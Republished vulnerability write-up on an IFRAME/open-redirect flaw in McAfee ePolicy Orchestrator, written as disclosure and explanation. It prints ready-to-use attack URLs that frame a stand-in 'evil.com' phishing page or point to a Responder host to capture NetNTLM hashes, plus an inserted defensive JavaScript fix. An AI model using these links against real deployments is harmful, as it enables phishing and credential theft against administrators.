2025-01-17 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article walks through a worked example of the HTML injection vulnerability in McAfee ePolicy Orchestrator. The editor considers it very practical and shares it here for reference; I hope you take something away from it.
Vulnerability overview
An unauthenticated client-side URL redirect vulnerability was disclosed in McAfee ePolicy Orchestrator (ePO) versions earlier than 5.10 Update 10. It allows an authenticated ePO user to be made to load an untrusted site inside an ePO IFRAME, which lets an attacker steal sensitive information about that user. Exploitation requires the attacker to induce an ePO user to click a malicious link while that user is logged in to the ePO server in their browser.
Vulnerability analysis
In internal security assessments, my task is usually to test critical corporate infrastructure and software. This time, our team was assigned to test the McAfee ePolicy Orchestrator deployment used by our company.
During the assessment I noticed that the product makes heavy use of postMessage and WebSockets, but one thing in particular caught our attention: the structure of the URL in the address bar.
The following is the normal URL structure in the browser address bar when we open the McAfee ePolicy Orchestrator dashboard:
https://epo-host:8443/core/orionNavigationLogin.do#/core/orionDefaultPage.do
The /core/orionDefaultPage.do part after the fragment is actually an HTTP endpoint which, like the other endpoints, is rendered to the user in an IFRAME below the top dashboard control bar; other endpoints are presented in IFRAMEs in the same way.
After noticing this, the first thing I tried was to inject a simple cross-site scripting payload and look at the result:
https://epo-host:8443/core/orionNavigationLogin.do#//_javascript:alert(1))
However, the web application correctly filtered out this payload, along with the other payloads I tried to inject.
So I examined the JavaScript code that performs the filtering, and found the following:
https://epo-host:8443/core/orionNavigationLogin.do#//google.com
The dashboard now displays the Google search page in the IFRAME below the top dashboard control bar. The fragment is treated as a path to load, and a leading double slash makes the browser resolve it as a protocol-relative URL to another host, so with this simple double-slash payload an attacker can inject any website into the dashboard. Given the way the dashboard presents data to users, an attacker can carry out not only phishing attacks with a high success rate, but also NetNTLM hash disclosure attacks.
Phishing attack scenario
The following is the normal URL structure of McAfee ePolicy Orchestrator:
https://epo-host:8443/core/orionNavigationLogin.do#/core/orionDefaultPage.do
An attacker only needs to replace the content after the # with a malicious URL or domain name and send the URL to a user with dashboard access:
https://epo-host:8443/core/orionNavigationLogin.do#//evil.com/phish-page.php
Note that the page hosted on the malicious domain must not set X-Frame-Options to "DENY" or "SAMEORIGIN", otherwise it will not load in the dashboard IFRAME. Since the malicious site is controlled by the attacker, this is obviously not a problem.
For a more convincing phishing attack, the dashboard's authorization endpoint and its GET parameter returnURL can be used to construct a more plausible URL:
https://epo-host:8443/SoftwareMgmt/enterLicenseKey.do?returnURL=%2f..%2fcore%2forionNavigationLogin.do%23%2f%2fevil.com%2fphish-page.php
The above link takes the user to the license key settings page in the dashboard, and after the user performs any action (save or cancel), they are redirected to the phishing page:
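The two weak spots described above (the `#//host` fragment loaded into the IFRAME, and the `returnURL` parameter that feeds it) come down to the same missing check: the candidate target is never resolved and compared against the dashboard's own origin. The following is an added example written for this article, not ePO's code: a resolver modelled on the filter the author hit next to a hardened version. The origin `https://epo-host:8443` and the function names are assumptions.

```javascript
// Added example (not ePO's code): fragment/returnURL routing modelled as a
// vulnerable resolver next to a hardened one. Hostnames are placeholders.
const EPO_ORIGIN = "https://epo-host:8443";

// Vulnerable: a denylist that stops "javascript:" but passes a protocol-relative
// "//host" through, so "#//evil.com/phish-page.php" loads another origin.
function vulnerableFrameTarget(fragment) {
  const path = fragment.replace(/^#/, "");
  if (/^\s*javascript:/i.test(path)) return null; // the filter that blocked the XSS attempt
  return path; // "//evil.com/..." is returned unchanged
}

// Hardened: resolve the candidate against the dashboard origin and accept it only
// if the result is still same-origin over https. new URL("//evil.com", base)
// yields "https://evil.com/", so the origin comparison rejects it; backslash
// variants resolve the same way, which a string denylist would miss.
function safeFrameTarget(candidate, base = EPO_ORIGIN) {
  const path = candidate.replace(/^#/, "");
  let resolved;
  try {
    resolved = new URL(path, base);
  } catch {
    return null; // unparsable input (e.g. an invalid port)
  }
  if (resolved.origin !== new URL(base).origin) return null;
  if (resolved.protocol !== "https:") return null;
  // Return only path + query; any fragment the candidate carried is dropped,
  // since the fragment is what the client-side router would act on.
  return resolved.pathname + resolved.search;
}

// The same check covers returnURL: URLSearchParams percent-decodes the value,
// then it is resolved and constrained exactly like the fragment.
function safeReturnUrl(queryString, base = EPO_ORIGIN) {
  const params = new URLSearchParams(queryString);
  const ret = params.get("returnURL");
  return ret === null ? null : safeFrameTarget(ret, base);
}
```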
https://epo-host:8443/core/orionNavigationLogin.do#//evil.com/phish-page.php
ePO user NetNTLM hash leakage scenario
An attacker can also craft a malicious link that points to a host running Responder or Inveigh and send it to a user with dashboard access, to carry out a NetNTLM hash disclosure attack:
https://epo-host:8443/core/orionNavigationLogin.do#//host-running-responder-or-inveigh
This concludes the article on "Example analysis of HTML injection vulnerabilities in McAfee ePolicy Orchestrator". I hope the content above is helpful to you; if you found the article useful, please share it so more people can see it.